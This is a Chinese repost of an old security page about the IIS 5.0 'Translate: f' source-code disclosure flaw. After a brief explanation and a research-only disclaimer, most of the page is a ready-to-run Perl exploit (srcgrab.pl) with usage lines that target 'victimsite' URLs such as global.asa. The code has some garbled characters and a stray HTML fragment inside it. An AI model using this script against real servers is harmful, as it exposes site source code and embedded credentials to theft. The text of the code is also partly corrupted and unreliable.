iis5的asp泄露

iis5的asp泄露

当 IIS 5.0 接收到一个特殊格式的头 (Translate: f) 的 HTTP 请求，同时 UR
L 末尾包含一个特殊字符时，IIS 会使用错误的处理方法导致文件源代码泄漏。


以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自
负

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 u
sing a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit
.
# This code was written after Daniel Docekal brought this issue in Bug
Traq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it磗 running !! kewl :)))
Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.co
m/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victi
m.com/default.asp > file_to_save
~; exit;}



$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . ‘’\\‘’; # Here is the ba
ckslash at the end of the url ;)
$req->content_type(‘’application/x-www-form-urlencoded‘’);
$req->content_type(‘’text/html‘’);
$req->header(Translate => ‘’f‘’); # Here is the famous translate header
:))
$req->content(‘’match=www&errors=0‘’);

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_suclearcase/" target="_blank" >ccess) {
print $res->content;
} else {
print $res->error_as_HTML;
}

原文转自：http://www.ltesting.net